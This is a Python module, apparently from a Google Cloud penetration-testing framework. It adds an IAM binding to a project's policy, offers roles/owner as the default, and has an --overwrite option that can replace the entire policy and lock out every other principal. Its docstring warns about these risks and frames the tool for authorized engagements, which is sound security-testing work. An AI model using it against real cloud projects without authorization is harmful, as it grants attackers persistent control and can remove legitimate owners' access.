from Modules.ResourceManager.utils.util_helpers import *
# Entrypoint
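def run_module(user_args, session, first_run = False, last_run = False):
    """Add an IAM binding (member -> role) to the IAM policy of one GCP project.

    Framework entry point. Flags are parsed from ``user_args``; whatever is not
    given on the command line is collected interactively through ``session``
    (project picker, member picker, role picker).

    Args:
        user_args: list of CLI tokens for this module (fed to argparse).
        session: framework session object. This function reads
            ``session.credentials``, queries the stored resource hierarchy with
            ``session.get_data``, uses ``choice_selector`` / ``choose_member`` /
            ``choose_role`` for prompts and records the change with
            ``session.insert_actions``.
        first_run / last_run: framework flags; part of the module interface
            but not used here.

    Returns:
        -1 on malformed input or when the operator backs out of a prompt;
        otherwise ``None`` (success/failure is reported on stdout).

    Security notes:
        * The default role offered interactively is ``roles/owner``. That is the
          most privileged (and most visible) binding available; prefer the least
          role that meets the objective when the engagement allows it.
        * ``--overwrite`` makes the helper fall back to replacing the *entire*
          policy with a single binding when the existing policy cannot be read.
          Every other principal loses access to the project and this module
          keeps no copy of the previous policy, so use it only with explicit
          authorization and after recording the current policy by other means.
        * The binding is only written to the session action log when a project
          ID is known, which is the case when the project is picked from the
          stored hierarchy. Bindings made via ``--project-name`` are NOT tracked
          for clean-up here; note them manually.
    """
    # Set up Argparser to handle flag arguments
    parser = argparse.ArgumentParser(description="Set the IAM Policy for a Given Project", allow_abbrev=False)
    # Debug/non-module specific
    parser.add_argument("-v","--debug",action="store_true",required=False,help="Get verbose data during the module run")
    # The help text used to describe folders (copied from the folder module); the
    # validator below only accepts the projects/<number> form, so say so.
    parser.add_argument("--project-name", type=str, required=False, help="Project system name (not user-assigned common name) ex: projects/ID")
    parser.add_argument("--role", type=str, required=False, help="Role to add (format - roles/<role_name>)")
    parser.add_argument("--member", type=str, required=False, help="User to add to the policy at the given role (format - user:<email> / serviceAccount:<email>)")
    parser.add_argument("--overwrite", action="store_true", required=False, help="If the current policy cannot be gathered and appended to, rewrite entire IAM policy with just your member")
    args = parser.parse_args(user_args)

    project_id = None
    debug = args.debug
    project_client = resourcemanager_v3.ProjectsClient(credentials=session.credentials)
    project_name, member, role = None, None, None

    # --- validate explicit flags before any API call ---------------------------
    if args.project_name:
        project_name = args.project_name
        # Shared validator, mode 2: accepted form is spelled out in the error text.
        status, incorrect_input = UtilityTools.validate_input_format(project_name, 2)
        if status != 0:
            print(f"{UtilityTools.RED}[X] Value \"{incorrect_input}\" is incorrect. Must be 'projects/[project_number]' Please try again...{UtilityTools.RESET}")
            return -1

    if args.member:
        member = args.member
        status, incorrect_input = UtilityTools.validate_user_format(member)
        if status != 0:
            print(f"{UtilityTools.RED}[X] Value \"{incorrect_input}\" is incorrect. Must be 'user:[email]' or 'serviceAccount:[email]' Please try again...{UtilityTools.RESET}")
            return -1

    if args.role:
        # Not format-checked: the value is passed verbatim to the IAM helper, so a
        # typo here surfaces only as an API error from setIamPolicy.
        role = args.role

    # --- interactive fallbacks for anything not supplied as a flag --------------
    if not project_name:
        rows_returned = session.get_data("abstract-tree-hierarchy", columns = ["name", "display_name","project_id"], conditions = "type=\"project\"")
        if not rows_returned:
            print("[X] No projects found. Try rerunning module with specified resource via --project-name ")
            return -1

        for row in rows_returned:
            row_name, row_display_name, row_project_id = row["name"], row["display_name"], row["project_id"]
            row["display_to_user"] = f"{row_name} (Project ID: {row_project_id}; Common Name: {row_display_name})"

        # Return dictionary corresponding to user choice
        project_dict = session.choice_selector(rows_returned,"Choose an existing project from below to edit the corresponding policy:", fields=["display_to_user"])
        if not project_dict:
            print("[X] Exiting the current module...")
            return -1

        # Project ID could be "Unknown"
        project_name = project_dict["name"]
        project_id = project_dict["project_id"]

    if not member:
        member = session.choose_member()
        if not member:
            print("Exiting...")
            return -1

    if not role:
        # roles/owner is the default offered; see the docstring for why that
        # should be a deliberate choice rather than a reflex.
        default_role = "roles/owner"
        allowed_project_roles_menu = [
            f"{default_role} (Default)",
            "roles/editor",
            "roles/viewer",
            "roles/resourcemanager.projectIamAdmin",
            "roles/resourcemanager.projectCreator"
        ]
        role = session.choose_role(allowed_project_roles_menu, chosen_role = args.role, default_role = default_role)
        if not role:
            return -1

    if debug:
        print(f"[DEBUG] Proceeding with:\n Project:{project_name}\n")
        print(f"[DEBUG] Proceeding with member: {member}")
        print(f"[DEBUG] Proceeding with role: {role}")

    if args.overwrite:
        # Destructive fallback: if the helper cannot read the current policy it will
        # set a policy containing only this binding, dropping every other principal.
        print(f"{UtilityTools.RED}[!] --overwrite set: if the current policy of {project_name} cannot be read it will be REPLACED with only {member} -> {role}; all other bindings would be removed.{UtilityTools.RESET}")

    print(f"[*] Binding Member {member} on {project_name} to role {role}")

    # Note project ID needs to exist to save perm
    action_dict = {}
    status = add_project_iam_member(project_client, project_name, member, action_dict, brute = args.overwrite, role = role, debug=debug)

    # Helper contract as used here: -1 means failure, any other truthy value means
    # the binding was applied, and a falsy return prints nothing.
    if status:
        if status == -1:
            print(f"{UtilityTools.RED}{UtilityTools.BOLD}[X] Failed to add {member} to policy of project {project_name}{UtilityTools.RESET}")
        else:
            print(f"{UtilityTools.GREEN}{UtilityTools.BOLD}[*] Successfully added {member} to the policy of project {project_name}{UtilityTools.RESET}")

    # Only recorded when the project was picked from the hierarchy (project_id
    # stays None for --project-name), so flag-driven runs are not tracked.
    if action_dict and project_id:
        session.insert_actions(action_dict, project_id)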